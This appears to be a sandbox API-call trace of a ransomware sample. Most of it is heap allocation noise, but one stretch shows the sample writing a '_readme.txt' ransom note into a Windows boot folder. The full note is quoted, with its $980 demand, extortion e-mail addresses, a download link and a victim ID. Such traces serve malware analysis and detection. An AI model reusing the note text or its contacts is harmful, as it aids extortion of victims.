HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.798] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0142.798] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0142.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.798] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.798] PathFindFileNameW (pszPath="") returned="" [0142.799] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.799] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.799] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3221ae8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.799] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.799] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0142.799] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.799] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 0 [0142.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.800] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.800] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9ab03c8 [0142.800] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\_readme.txt" (normalized: "c:\\boot\\ja-jp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3221ae8 [0142.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x325d510 [0142.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x325d510, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", lpUsedDefaultChar=0x0) returned 1116 [0142.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x321dfc8 [0142.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.801] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.801] WriteFile (in: hFile=0x6f0, lpBuffer=0x321dfc8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x321dfc8*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.801] CloseHandle (hObject=0x6f0) returned 1 [0142.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321dfc8 | out: hHeap=0x620000) returned 1 [0142.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ab03c8 | out: hHeap=0x620000) returned 1 [0142.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 [0142.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.802] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8b73250, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8b73250, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.802] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8b73250, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8b73250, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.802] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0142.802] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8b73250, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8b73250, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8b73250, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.802] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8b73250, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8b73250, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8b73250, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.802] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.802] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 